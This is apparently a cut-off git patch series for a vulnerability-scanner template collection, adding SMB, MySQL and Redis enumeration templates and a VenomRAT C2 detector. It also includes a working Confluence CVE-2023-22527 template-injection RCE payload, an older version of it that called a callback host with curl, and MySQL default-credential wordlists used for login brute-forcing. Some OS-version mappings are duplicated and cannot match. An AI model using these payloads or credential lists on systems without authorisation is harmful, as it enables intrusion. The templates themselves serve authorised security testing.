js,network,smb,enum + +javascript: + - code: | + var m = require("nuclei/smb"); + var c = m.SMBClient(); + var response = c.ListSMBv2Metadata(Host, Port); + to_json(response); + + args: + Host: "{{Host}}" + Port: "445" + matchers: + - type: dsl + dsl: + - "len(DNSDomainName) != 0" + + extractors: + - type: json + internal: true + name: DNSDomainName + json: + - '.DNSDomainName' + + - type: json + json: + - '"DomainName: "+ .DNSDomainName ' diff --git a/javascript/enumeration/smb/smb-os-detect.yaml b/javascript/enumeration/smb/smb-os-detect.yaml new file mode 100644 index 0000000000..180b7cdd54 --- /dev/null +++ b/javascript/enumeration/smb/smb-os-detect.yaml @@ -0,0 +1,158 @@ +id: smb-os-detect + +info: + name: SMB Operating System - Detect + author: pussycat0x + severity: info + description: | + Detect Operating System + reference: + - https://nmap.org/nsedoc/scripts/smb-os-discovery.html + metadata: + shodan-query: "port:445" + tags: js,network,smb,enum,os + +javascript: + - code: | + var m = require("nuclei/smb"); + var c = m.SMBClient(); + var response = c.ListSMBv2Metadata(Host, Port); + if (response.OSVersion === "6.3.9600") { + osInfo = "Windows 8.1"; + } else if (response.OSVersion === "3.10.511") { + osInfo = "Windows NT 3.1"; + } else if (response.OSVersion === "3.50.807") { + osInfo = "Windows NT 3.5"; + } else if (response.OSVersion === "3.10.528") { + osInfo = "Windows NT 3.1, Service Pack 3"; + } else if (response.OSVersion === "3.51.1057") { + osInfo = "Windows NT 3.51"; + } else if (response.OSVersion === "4.00.950") { + osInfo = "Windows 95"; + } else if (response.OSVersion === "4.00.950A") { + osInfo = "Windows 95 OEM Service Release 1"; + } else if (response.OSVersion === "4.00.950B") { + osInfo = "Windows 95 OEM Service Release 2"; + } else if (response.OSVersion === "4.0.1381") { + osInfo = "Windows NT 4.0"; + } else if (response.OSVersion === "4.00.950B") { + osInfo = "Windows 95 OEM Service Release 2.1"; + } else if (response.OSVersion === "4.00.950C") { + osInfo = "OEM Service Release 2.5"; + } else if (response.OSVersion === "4.10.1998") { + osInfo = "Windows 98"; + } else if (response.OSVersion === "4.10.2222") { + osInfo = "Windows 98 Second Edition (SE)"; + } else if (response.OSVersion === "5.0.2195") { + osInfo = "Windows 2000"; + } else if (response.OSVersion === "4.90.3000") { + osInfo = "Windows Me"; + } else if (response.OSVersion === "5.1.2600") { + osInfo = "Windows XP"; + } else if (response.OSVersion === "5.1.2600.1105-1106") { + osInfo = "Windows XP, Service Pack 1"; + } else if (response.OSVersion === "5.2.3790") { + osInfo = "Windows Server 2003"; + } else if (response.OSVersion === "5.1.2600.2180") { + osInfo = "Windows XP, Service Pack 2"; + } else if (response.OSVersion === "5.2.3790.1180") { + osInfo = "Windows Server 2003, Service Pack 1"; + } else if (response.OSVersion === "5.2.3790") { + osInfo = "Windows Server 2003 R2"; + } else if (response.OSVersion === "6.0.6000") { + osInfo = "Windows Vista"; + } else if (response.OSVersion === "5.2.3790") { + osInfo = "Windows Server 2003, Service Pack 2"; + } else if (response.OSVersion === "5.2.4500") { + osInfo = "Windows Home Server"; + } else if (response.OSVersion === "6.0.6001") { + osInfo = "Windows Vista, Service Pack 1"; + } else if (response.OSVersion === "6.0.6001") { + osInfo = "Windows Server 2008"; + } else if (response.OSVersion === "5.1.2600") { + osInfo = "Windows XP, Service Pack 3"; + } else if (response.OSVersion === "6.0.6002") { + osInfo = "Windows Vista, Service Pack 2"; + } else if (response.OSVersion === "6.0.6002") { + osInfo = "Windows Server 2008, Service Pack 2"; + } else if (response.OSVersion === "6.1.7600") { + osInfo = "Windows 7"; + } else if (response.OSVersion === "6.1.7600") { + osInfo = "Windows Server 2008 R2"; + } else if (response.OSVersion === "6.1.7601") { + osInfo = "Windows 7, Service Pack 1"; + } else if (response.OSVersion === "6.1.7601") { + osInfo = "Windows Server 2008 R2, Service Pack "; + } else if (response.OSVersion === "6.1.8400") { + osInfo = "Windows Home Server 2011"; + } else if (response.OSVersion === "6.2.9200") { + osInfo = "Windows Server 2012"; + } else if (response.OSVersion === "6.2.9200") { + osInfo = "Windows 8"; + } else if (response.OSVersion === "6.3.9600") { + osInfo = "Windows 8.1"; + } else if (response.OSVersion === "6.3.9600") { + osInfo = "Windows Server 2012 R2"; + } else if (response.OSVersion === "10.0.10240") { + osInfo = "Windows 10, Version 1507"; + } else if (response.OSVersion === "10.0.10586") { + osInfo = "Windows 10, Version 1511"; + } else if (response.OSVersion === "10.0.14393") { + osInfo = "Windows 10, Version 1607"; + } else if (response.OSVersion === "10.0.14393") { + osInfo = "Windows Server 2016, Version 1607"; + } else if (response.OSVersion === "10.0.15063") { + osInfo = "Windows 10, Version 1703"; + } else if (response.OSVersion === "10.0.16299") { + osInfo = "Windows 10, Version 1709"; + } else if (response.OSVersion === "10.0.17134") { + osInfo = "Windows 10, Version 1803"; + } else if (response.OSVersion === "10.0.17763") { + osInfo = "Windows Server 2019, Version 1809"; + } else if (response.OSVersion === "10.0.17763") { + osInfo = "Windows 10, Version 1809"; + } else if (response.OSVersion === "6.0.6003") { + osInfo = "Windows Server 2008, Service Pack 2, Rollup KB4489887"; + } else if (response.OSVersion === "10.0.18362") { + osInfo = "Windows 10, Version 1903"; + } else if (response.OSVersion === "10.0.18363") { + osInfo = "Windows 10, Version 1909"; + } else if (response.OSVersion === "10.0.18363") { + osInfo = "Windows Server, Version 1909"; + } else if (response.OSVersion === "10.0.19041") { + osInfo = "Windows 10, Version 2004"; + } else if (response.OSVersion === "10.0.19041") { + osInfo = "Windows Server, Version 2004"; + } else if (response.OSVersion === "10.0.19042") { + osInfo = "Windows 10, Version 20H2"; + } else if (response.OSVersion === "10.0.19042") { + osInfo = "Windows Server, Version 20H2"; + } else if (response.OSVersion === "10.0.19043") { + osInfo = "Windows 10, Version 21H1"; + } else if (response.OSVersion === "10.0.20348") { + osInfo = "Windows Server 2022, Version 21H2"; + } else if (response.OSVersion === "10.0.22000") { + osInfo = "Windows 11, Version 21H2"; + } else if (response.OSVersion === "10.0.19044") { + osInfo = "Windows 10, Version 21H2"; + } else if (response.OSVersion === "10.0.22621") { + osInfo = "Windows 11, Version 22H2"; + } else if (response.OSVersion === "10.0.19045") { + osInfo = "Windows 10, Version 22H2"; + } else if (response.OSVersion === "10.0.25398") { + osInfo = "Windows Server, Version 23H2"; + } else if (response.OSVersion === "10.0.22631") { + osInfo = "Windows 11, Version 23H2"; + } else if (response.OSVersion !== "0") { + osInfo = response.OSVersion; + } + osInfo; + + args: + Host: "{{Host}}" + Port: "445" + + extractors: + - type: dsl + dsl: + - response \ No newline at end of file diff --git a/javascript/enumeration/smb/smb-version-detect.yaml b/javascript/enumeration/smb/smb-version-detect.yaml new file mode 100644 index 0000000000..a7ec579271 --- /dev/null +++ b/javascript/enumeration/smb/smb-version-detect.yaml @@ -0,0 +1,28 @@ +id: smb-version-detect + +info: + name: SMB Version - Detection + author: pussycat0x + severity: info + description: | + SMB version detection involves identifying the specific Server Message Block protocol version used by a system or network. This process is crucial for ensuring compatibility and security, as different SMB versions may have distinct features and vulnerabilities. + metadata: + shodan-query: "port:445" + tags: js,network,smb,enum + +javascript: + - code: | + let m = require("nuclei/smb"); + let c = m.SMBClient(); + let response = c.ConnectSMBInfoMode(Host, Port); + to_json(response); + + args: + Host: "{{Host}}" + Port: "445" + + extractors: + - type: json + name: smb-version + json: + - '.Version.VerString' diff --git a/javascript/mysql/mysql-db-enum.yaml b/javascript/mysql/mysql-db-enum.yaml new file mode 100644 index 0000000000..909ef0b518 --- /dev/null +++ b/javascript/mysql/mysql-db-enum.yaml @@ -0,0 +1,44 @@ +id: mysql-db-enum + +info: + name: MySQL Database - Enumeration + author: pussycat0x + severity: high + metadata: + shodan-query: port:3306 + tags: js,mssql,network,enum,fuzz + +javascript: + - code: | + let m = require('nuclei/mysql'); + let c = m.MySQLClient(); + let result = c.ConnectWithDB(Host,Port,User,Pass,dbName); + result; + + args: + Host: "{{Host}}" + Port: "3306" + dbName: "{{db}}" + User: "{{usernames}}" + Pass: "{{passwords}}" + + threads: 10 + attack: pitchfork + + stop-at-first-match: true + + payloads: + db: + - information_schema + - performance_schema + - mysql + + usernames: helpers/wordlists/mysql-users.txt + passwords: helpers/wordlists/mysql-passwords.txt + + matchers: + - type: dsl + dsl: + - "response == true" + - "success == true" + condition: and diff --git a/javascript/mysql/mysql-default-login.yaml b/javascript/mysql/mysql-default-login.yaml new file mode 100644 index 0000000000..a285e9e135 --- /dev/null +++ b/javascript/mysql/mysql-default-login.yaml @@ -0,0 +1,44 @@ +id: mysql-default-login + +info: + name: MySQL - Default Login + author: DhiyaneshDk,pussycat0x,ritikchaddha + severity: high + description: | + A MySQL service was accessed with easily guessed credentials. + metadata: + shodan-query: port:3306 + verified: true + tags: js,mysql,default-login,network,fuzz + +javascript: + - pre-condition: | + var m = require("nuclei/mysql"); + var c = m.MySQLClient(); + c.IsMySQL(Host, Port); + + code: | + var m = require("nuclei/mysql"); + var c = m.MySQLClient(); + c.Connect(Host,Port,Username,Password) + + args: + Host: "{{Host}}" + Port: "3306" + User: "{{usernames}}" + Pass: "{{passwords}}" + + threads: 10 + attack: pitchfork + + payloads: + usernames: helpers/wordlists/mysql-users.txt + passwords: helpers/wordlists/mysql-passwords.txt + stop-at-first-match: true + + matchers: + - type: dsl + dsl: + - "response == true" + - "success == true" + condition: and diff --git a/javascript/mysql/mysql-show-variables.yaml b/javascript/mysql/mysql-show-variables.yaml new file mode 100644 index 0000000000..778c32ec4a --- /dev/null +++ b/javascript/mysql/mysql-show-variables.yaml @@ -0,0 +1,45 @@ +id: mysql-show-variables + +info: + name: MySQL - Show Variables + author: DhiyaneshDk + severity: high + description: Attempts to show all variables on a MySQL server. + reference: + - https://nmap.org/nsedoc/scripts/mysql-variables.html + metadata: + shodan-query: port:3306 + tags: js,mysql,network,fuzz + +javascript: + - code: | + let m = require('nuclei/mysql'); + let c = m.MySQLClient(); + let response = c.ExecuteQuery(Host,Port,User,Pass,Query); + log(to_json(response)); + + args: + Host: "{{Host}}" + Port: "3306" + User: "{{usernames}}" + Pass: "{{passwords}}" + Query: "show variables;" + + threads: 10 + attack: pitchfork + + payloads: + usernames: helpers/wordlists/mysql-users.txt + passwords: helpers/wordlists/mysql-passwords.txt + stop-at-first-match: true + + matchers: + - type: dsl + dsl: + - "success == true" + + extractors: + - type: json + part: response + json: + - '.Rows[].Variable_name' diff --git a/javascript/mysql/mysql-user-enum.yaml b/javascript/mysql/mysql-user-enum.yaml new file mode 100644 index 0000000000..4df366eea5 --- /dev/null +++ b/javascript/mysql/mysql-user-enum.yaml @@ -0,0 +1,47 @@ +id: mysql-user-enum + +info: + name: MySQL - User Enumeration + author: pussycat0x + severity: high + description: | + Attempts to list all users on a MySQL server. + reference: + - https://nmap.org/nsedoc/scripts/mysql-users.html + metadata: + shodan-query: port:3306 + verified: true + tags: js,mysql,network,enum,fuzz + +javascript: + - code: | + let m = require('nuclei/mysql'); + let c = m.MySQLClient(); + let response = c.ExecuteQuery(Host,Port,User,Pass,Query); + to_json(response); + + args: + Host: "{{Host}}" + Port: "3306" + Query: "SELECT DISTINCT user FROM mysql.user;" + User: "{{usernames}}" + Pass: "{{passwords}}" + + threads: 10 + attack: pitchfork + + payloads: + usernames: helpers/wordlists/mysql-users.txt + passwords: helpers/wordlists/mysql-passwords.txt + stop-at-first-match: true + + matchers: + - type: dsl + dsl: + - "success == true" + + extractors: + - type: json + part: response + json: + - '.Rows[].user' diff --git a/javascript/network/mysql/mysql-empty-password.yaml b/javascript/network/mysql/mysql-empty-password.yaml new file mode 100644 index 0000000000..7c9973ea90 --- /dev/null +++ b/javascript/network/mysql/mysql-empty-password.yaml @@ -0,0 +1,41 @@ +id: mysql-empty-password + +info: + name: MySQL - Empty Password + author: DhiyaneshDk + severity: high + description: | + Checks for MySQL servers with an empty password for root or anonymous. + metadata: + shodan-query: port:3306 + tags: js,mssql,network + +javascript: + - pre-condition: | + var m = require("nuclei/mysql"); + var c = m.MySQLClient(); + c.IsMySQL(Host, Port); + + code: | + var m = require("nuclei/mysql"); + var c = m.MySQLClient(); + c.Connect(Host,Port,User,Pass) + + args: + Host: "{{Host}}" + Port: "3306" + User: "{{username}}" + Pass: " " + + payloads: + usernames: + - root + - anonymous + + stop-at-first-match: true + matchers: + - type: dsl + dsl: + - "response == true" + - "success == true" + condition: and diff --git a/javascript/network/mysql/mysql-show-databases.yaml b/javascript/network/mysql/mysql-show-databases.yaml new file mode 100644 index 0000000000..6df95d25fd --- /dev/null +++ b/javascript/network/mysql/mysql-show-databases.yaml @@ -0,0 +1,45 @@ +id: mysql-show-databases + +info: + name: MySQL - Show Databases + author: DhiyaneshDk + severity: high + reference: + - https://nmap.org/nsedoc/scripts/mysql-databases.html + metadata: + shodan-query: port:3306 + verified: true + tags: js,mysql,network,fuzz + +javascript: + - code: | + let m = require('nuclei/mysql'); + let c = m.MySQLClient(); + let response = c.ExecuteQuery(Host,Port,User,Pass,Query); + to_json(response); + + args: + Host: "{{Host}}" + Port: "3306" + Query: "show databases;" + User: "{{usernames}}" + Pass: "{{passwords}}" + + threads: 10 + attack: pitchfork + + payloads: + usernames: helpers/wordlists/mysql-users.txt + passwords: helpers/wordlists/mysql-passwords.txt + stop-at-first-match: true + + matchers: + - type: dsl + dsl: + - "success == true" + + extractors: + - type: json + part: response + json: + - .Rows[] | .Database diff --git a/javascript/network/redis/redis-info.yaml b/javascript/network/redis/redis-info.yaml new file mode 100644 index 0000000000..4a228a1a74 --- /dev/null +++ b/javascript/network/redis/redis-info.yaml @@ -0,0 +1,39 @@ +id: redis-info + +info: + name: Redis Info - Detect + author: DhiyaneshDK + severity: info + description: | + Retrieves information (such as version number and architecture) from a Redis key-value store. + reference: + - https://nmap.org/nsedoc/scripts/redis-info.html + metadata: + max-request: 1 + shodan-query: product:"redis" + tags: js,redis,network + +javascript: + - code: | + const redis = require('nuclei/redis'); + const info = redis.GetServerInfo(Host,Port); + Export(info); + + args: + Host: "{{Host}}" + Port: "6379" + + extractors: + - type: regex + part: response + regex: + - redis_version:(\d+\.\d+\.\d+) + - os:(.*?)\\r\\n + - arch_bits:(\d+)\s+bits + - process_id:(\d+) + - used_cpu_sys:(\d+\.\d+) + - used_cpu_user:(\d+\.\d+) + - connected_clients:(\d+) + - connected_slaves:(\d+) + - used_memory_human:(\d+\.\d+[KMGTPEZY]?) + - role:(\w+) diff --git a/javascript/network/redis/redis-require-auth.yaml b/javascript/network/redis/redis-require-auth.yaml new file mode 100644 index 0000000000..d87e34fc94 --- /dev/null +++ b/javascript/network/redis/redis-require-auth.yaml @@ -0,0 +1,29 @@ +id: redis-require-auth + +info: + name: Redis Require Authentication - Detect + author: DhiyaneshDK + severity: info + description: | + IsAuthenticated checks if the redis server requires authentication + reference: + - https://docs.projectdiscovery.io/templates/protocols/javascript/modules/redis#isauthenticated + metadata: + max-request: 1 + shodan-query: product:"redis" + tags: js,redis,network + +javascript: + - code: | + const redis = require('nuclei/redis'); + const isAuthenticated = redis.IsAuthenticated(Host,Port); + Export(isAuthenticated); + + args: + Host: "{{Host}}" + Port: "6379" + + matchers: + - type: dsl + dsl: + - "success == true" diff --git a/javascript/network/smb/smb2-server-time.yaml b/javascript/network/smb/smb2-server-time.yaml new file mode 100644 index 0000000000..3cb9148b8d --- /dev/null +++ b/javascript/network/smb/smb2-server-time.yaml @@ -0,0 +1,38 @@ +id: smb2-server-time + +info: + name: SMB2 Server Time - Detection + author: DhiyaneshDK + severity: info + description: | + Trying to retrieve the present date of the system along with the initiation date of an SMB2 server. + reference: + - https://nmap.org/nsedoc/scripts/smb2-time.html + metadata: + shodan-query: "port:445" + verified: true + tags: js,network,smb,enum + +javascript: + - code: | + var m = require("nuclei/smb"); + var c = m.SMBClient(); + var response = c.ConnectSMBInfoMode(Host,Port); + var systemTime = new Date(response.NegotiationLog.SystemTime * 1000).toISOString(); + var serverstartTime = new Date(response.NegotiationLog.ServerStartTime * 1000).toISOString(); + var result = "SystemTime: " + systemTime + " ServerStartTime: " + serverstartTime; + result + + args: + Host: "{{Host}}" + Port: "445" + + matchers: + - type: dsl + dsl: + - success + + extractors: + - type: dsl + dsl: + - response diff --git a/ssl/c2/venomrat.yaml b/ssl/c2/venomrat.yaml new file mode 100644 index 0000000000..cb8bfbcf42 --- /dev/null +++ b/ssl/c2/venomrat.yaml @@ -0,0 +1,26 @@ +id: venomrat + +info: + name: VenomRAT - Detect + author: pussycat0x + severity: info + reference: + - https://twitter.com/v0lundr_/status/1727277517659353297 + metadata: + verified: "true" + max-request: 1 + fofa-query: cert.issuer.cn="VenomRAT Server" + tags: c2,ir,osint,malware,ssl,venomrat + +ssl: + - address: "{{Host}}:{{Port}}" + matchers: + - type: word + part: issuer_cn + words: + - "VenomRAT Server" + + extractors: + - type: json + json: + - ".issuer_cn" From ded264e153f06a31dc89cdca1ebda10155f20474 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 9 Mar 2024 21:25:30 +0530 Subject: [PATCH 02/13] duplicate template --- http/cves/2023/CVE-2023-22527.yaml | 37 ++++++++++++++---------- http/cves/2023/CVE-2023-6895.yaml | 5 ++-- http/cves/2023/CVE-2024-21893.yaml | 45 ------------------------------ 3 files changed, 26 insertions(+), 61 deletions(-) delete mode 100644 http/cves/2023/CVE-2024-21893.yaml diff --git a/http/cves/2023/CVE-2023-22527.yaml b/http/cves/2023/CVE-2023-22527.yaml index bcce43b020..d7d025c7bf 100644 --- a/http/cves/2023/CVE-2023-22527.yaml +++ b/http/cves/2023/CVE-2023-22527.yaml @@ -1,21 +1,29 @@ id: CVE-2023-22527 info: - name: Atlassian Confluence Unauthenticted Remote Code Execution + name: Atlassian Confluence - Remote Code Execution author: iamnooob,rootxharsh,pdresearch severity: critical - description: |- - A template injection vulnerability on older versions of Confluence Data Center and Server allows an unauthenticated attacker to achieve RCE on an affected instance. Customers using an affected version must take immediate action. Most recent supported versions of Confluence Data Center and Server are not affected by this vulnerability as it was ultimately mitigated during regular version updates. However, Atlassian recommends that customers take care to install the latest version to protect their instances from non-critical vulnerabilities outlined in Atlassian’s January Security Bulletin. + description: | + A template injection vulnerability on older versions of Confluence Data Center and Server allows an unauthenticated attacker to achieve RCE on an affected instance. Customers using an affected version must take immediate action. + Most recent supported versions of Confluence Data Center and Server are not affected by this vulnerability as it was ultimately mitigated during regular version updates. However, Atlassian recommends that customers take care to install the latest version to protect their instances from non-critical vulnerabilities outlined in Atlassian’s January Security Bulletin. reference: - https://confluence.atlassian.com/pages/viewpage.action?pageId=1333335615 - https://jira.atlassian.com/browse/CONFSERVER-93833 + - https://blog.projectdiscovery.io/atlassian-confluence-ssti-remote-code-execution/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cve-id: CVE-2023-22527 epss-score: 0.00044 - epss-percentile: 0.08185 - tags: cve,cve2023,confluence + epss-percentile: 0.08115 + cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: atlassian + product: confluence_data_center + shodan-query: http.component:"Atlassian Confluence" + tags: cve,cve2023,confluence,rce,ssti http: - raw: @@ -23,18 +31,19 @@ http: POST /template/aui/text-inline.vm HTTP/1.1 Host: {{Hostname}} Accept-Encoding: gzip, deflate, br - Accept: */* Content-Type: application/x-www-form-urlencoded - Content-Length: 335 - label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=(new freemarker.template.utility.Execute()).exec({"curl {{interactsh-url}}"}) + label=aaa\u0027%2b#request.get(\u0027.KEY_velocity.struts2.context\u0027).internalGet(\u0027ognl\u0027).findValue(#parameters.poc[0],{})%2b\u0027&poc=@org.apache.struts2.ServletActionContext@getResponse().setHeader(\u0027x_vuln_check\u0027,(new+freemarker.template.utility.Execute()).exec({"whoami"})) - matchers-condition: and matchers: - - type: word - part: body - words: - - 'Empty{name=' - type: dsl dsl: - - "contains(interactsh_protocol, 'dns')" + - x_vuln_check != "" # check for custom header key exists + - contains(to_lower(body), 'empty{name=') + condition: and + + extractors: + - type: dsl + dsl: + - x_vuln_check # prints the output of whoami +# digest: 4b0a00483046022100cad74b2de250961c24ea16a5b8ed5cf9c1b4fa29b81cbfca33f3b72f5a4474c5022100c501f652babe15618734328d07936a3c399f964dfc0a67db2a8a61dd9e20a6ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6895.yaml b/http/cves/2023/CVE-2023-6895.yaml index ae97042eb3..69da102528 100644 --- a/http/cves/2023/CVE-2023-6895.yaml +++ b/http/cves/2023/CVE-2023-6895.yaml @@ -2,9 +2,10 @@ id: CVE-2023-6895 info: name: Hikvision IP ping.php - Command Execution - author: DhiyaneshDk + author: DhiyaneshDk,archer severity: critical - description: A vulnerability was found in Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK). It has been declared as critical. This vulnerability affects unknown code of the file /php/ping.php. The manipulation of the argument jsondata[ip] with the input netstat -ano leads to os command injection. The exploit has been disclosed to the public and may be used. Upgrading to version 4.1.0 is able to address this issue. It is recommended to upgrade the affected component. VDB-248254 is the identifier assigned to this vulnerability. + description: | + A vulnerability was found in Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK). It has been declared as critical. This vulnerability affects unknown code of the file /php/ping.php. The manipulation of the argument jsondata[ip] with the input netstat -ano leads to os command injection. The exploit has been disclosed to the public and may be used. Upgrading to version 4.1.0 is able to address this issue. It is recommended to upgrade the affected component. VDB-248254 is the identifier assigned to this vulnerability. reference: - https://vuldb.com/?ctiid.248254 - https://vuldb.com/?id.248254 diff --git a/http/cves/2023/CVE-2024-21893.yaml b/http/cves/2023/CVE-2024-21893.yaml deleted file mode 100644 index d58f98dc69..0000000000 --- a/http/cves/2023/CVE-2024-21893.yaml +++ /dev/null @@ -1,45 +0,0 @@ -id: CVE-2024-21893 - -info: - name: Ivanti SAML - Server Side Request Forgery (SSRF) - author: DhiyaneshDk - severity: high - description: | - A server-side request forgery vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) and Ivanti Neurons for ZTA allows an attacker to access certain restricted resources without authentication. - reference: - - https://attackerkb.com/topics/FGlK1TVnB2/cve-2024-21893/rapid7-analysis - - https://www.assetnote.io/resources/research/ivantis-pulse-connect-secure-auth-bypass-round-two - - https://github.com/advisories/GHSA-5rr9-mqhj-7cr2 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N - cvss-score: 8.2 - cve-id: CVE-2024-21893 - cwe-id: CWE-918 - cpe: cpe:2.3:a:ivanti:connect_secure:9.0:-:*:*:*:*:*:* - metadata: - vendor: ivanti - product: connect_secure - shodan-query: "html:\"welcome.cgi?p=logo\"" - tags: cve,cve2024,kev,ssrf,ivanti - -http: - - raw: - - | - POST /dana-ws/saml20.ws HTTP/1.1 - Host: {{Hostname}} - - qwerty - - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol # Confirms the DNS Interaction - words: - - "dns" - - - type: word - part: body - words: - - '/dana-na/' - - 'WriteCSS' - condition: and From 1a2e86eacbe936d3099ab21afb34d8dc01074299 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 9 Mar 2024 21:36:14 +0530 Subject: [PATCH 03/13] Added Helper for mysql --- helpers/wordlists/mysql-passwords.txt | 19 +++++++++++++++++++ helpers/wordlists/mysql-users.txt | 7 +++++++ 2 files changed, 26 insertions(+) create mode 100644 helpers/wordlists/mysql-passwords.txt create mode 100644 helpers/wordlists/mysql-users.txt diff --git a/helpers/wordlists/mysql-passwords.txt b/helpers/wordlists/mysql-passwords.txt new file mode 100644 index 0000000000..c514e405ad --- /dev/null +++ b/helpers/wordlists/mysql-passwords.txt @@ -0,0 +1,19 @@ +mysql +root +chippc +admin +nagiosxi +usbw +cloudera +moves +testpw +p@ck3tf3nc3 +medocheck123 +mktt +123 +amp109 +eLaStIx.asteriskuser.2oo7 +raspberry +openauditrootuserpassword +vagrant +123qweASD# \ No newline at end of file diff --git a/helpers/wordlists/mysql-users.txt b/helpers/wordlists/mysql-users.txt new file mode 100644 index 0000000000..37e33b4a7e --- /dev/null +++ b/helpers/wordlists/mysql-users.txt @@ -0,0 +1,7 @@ +root +admin +cloudera +moves +mcUser +dbuser +asteriskuser \ No newline at end of file From fecc2c6470306efdd50873ced237a3b08f00121d Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Sat, 9 Mar 2024 23:48:37 +0530 Subject: [PATCH 04/13] Update mysql-load-file.yaml --- javascript/audit/mysql/mysql-load-file.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/audit/mysql/mysql-load-file.yaml b/javascript/audit/mysql/mysql-load-file.yaml index 5fc8f03f36..b74fe517a2 100644 --- a/javascript/audit/mysql/mysql-load-file.yaml +++ b/javascript/audit/mysql/mysql-load-file.yaml @@ -32,8 +32,8 @@ javascript: payloads: usernames: helpers/wordlists/mysql-users.txt passwords: helpers/wordlists/mysql-passwords.txt - stop-at-first-match: true + stop-at-first-match: true matchers-condition: and matchers: - type: dsl From b8281c259864bc20d284079806878eaaf5f7347e Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Sun, 10 Mar 2024 00:02:19 +0530 Subject: [PATCH 05/13] minor - changes --- javascript/audit/mysql/mysql-load-file.yaml | 2 +- javascript/enumeration/smb/rsync/rsync-version.yaml | 2 +- javascript/enumeration/smb/smb-enum-domains.yaml | 2 +- javascript/enumeration/smb/smb-version-detect.yaml | 2 +- javascript/mysql/mysql-show-variables.yaml | 2 +- javascript/mysql/mysql-user-enum.yaml | 2 +- javascript/network/mysql/mysql-show-databases.yaml | 2 +- 7 files changed, 7 insertions(+), 7 deletions(-) diff --git a/javascript/audit/mysql/mysql-load-file.yaml b/javascript/audit/mysql/mysql-load-file.yaml index b74fe517a2..f4fed479ce 100644 --- a/javascript/audit/mysql/mysql-load-file.yaml +++ b/javascript/audit/mysql/mysql-load-file.yaml @@ -17,7 +17,7 @@ javascript: let m = require('nuclei/mysql'); let c = m.MySQLClient(); let response = c.ExecuteQuery(Host,Port,User,Pass,Query); - to_json(response); + Export(response); args: Host: "{{Host}}" diff --git a/javascript/enumeration/smb/rsync/rsync-version.yaml b/javascript/enumeration/smb/rsync/rsync-version.yaml index e986a8298d..e000224e17 100644 --- a/javascript/enumeration/smb/rsync/rsync-version.yaml +++ b/javascript/enumeration/smb/rsync/rsync-version.yaml @@ -17,7 +17,7 @@ javascript: let m = require('nuclei/rsync'); let c = m.RsyncClient(); let response = c.IsRsync(Host,Port); - to_json(response); + Export(response); args: Host: "{{Host}}" diff --git a/javascript/enumeration/smb/smb-enum-domains.yaml b/javascript/enumeration/smb/smb-enum-domains.yaml index b5c21ace5a..31290a3afe 100644 --- a/javascript/enumeration/smb/smb-enum-domains.yaml +++ b/javascript/enumeration/smb/smb-enum-domains.yaml @@ -19,7 +19,7 @@ javascript: var m = require("nuclei/smb"); var c = m.SMBClient(); var response = c.ListSMBv2Metadata(Host, Port); - to_json(response); + Export(response); args: Host: "{{Host}}" diff --git a/javascript/enumeration/smb/smb-version-detect.yaml b/javascript/enumeration/smb/smb-version-detect.yaml index a7ec579271..863822b030 100644 --- a/javascript/enumeration/smb/smb-version-detect.yaml +++ b/javascript/enumeration/smb/smb-version-detect.yaml @@ -15,7 +15,7 @@ javascript: let m = require("nuclei/smb"); let c = m.SMBClient(); let response = c.ConnectSMBInfoMode(Host, Port); - to_json(response); + Export(response); args: Host: "{{Host}}" diff --git a/javascript/mysql/mysql-show-variables.yaml b/javascript/mysql/mysql-show-variables.yaml index 778c32ec4a..6d3b05cbd1 100644 --- a/javascript/mysql/mysql-show-variables.yaml +++ b/javascript/mysql/mysql-show-variables.yaml @@ -16,7 +16,7 @@ javascript: let m = require('nuclei/mysql'); let c = m.MySQLClient(); let response = c.ExecuteQuery(Host,Port,User,Pass,Query); - log(to_json(response)); + Export(response); args: Host: "{{Host}}" diff --git a/javascript/mysql/mysql-user-enum.yaml b/javascript/mysql/mysql-user-enum.yaml index 4df366eea5..11e39ecd2b 100644 --- a/javascript/mysql/mysql-user-enum.yaml +++ b/javascript/mysql/mysql-user-enum.yaml @@ -18,7 +18,7 @@ javascript: let m = require('nuclei/mysql'); let c = m.MySQLClient(); let response = c.ExecuteQuery(Host,Port,User,Pass,Query); - to_json(response); + Export(response); args: Host: "{{Host}}" diff --git a/javascript/network/mysql/mysql-show-databases.yaml b/javascript/network/mysql/mysql-show-databases.yaml index 6df95d25fd..f45037c2d4 100644 --- a/javascript/network/mysql/mysql-show-databases.yaml +++ b/javascript/network/mysql/mysql-show-databases.yaml @@ -16,7 +16,7 @@ javascript: let m = require('nuclei/mysql'); let c = m.MySQLClient(); let response = c.ExecuteQuery(Host,Port,User,Pass,Query); - to_json(response); + Export(response); args: Host: "{{Host}}" From c1728652ce19e8ad631c2aefd5aa88479b1096d1 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Sun, 10 Mar 2024 21:44:07 +0530 Subject: [PATCH 06/13] struct - changes --- javascript/enumeration/{smb => }/pop3/pop3-capabilities-enum.yaml | 0 javascript/enumeration/{smb => }/rsync/rsync-version.yaml | 0 2 files changed, 0 insertions(+), 0 deletions(-) rename javascript/enumeration/{smb => }/pop3/pop3-capabilities-enum.yaml (100%) rename javascript/enumeration/{smb => }/rsync/rsync-version.yaml (100%) diff --git 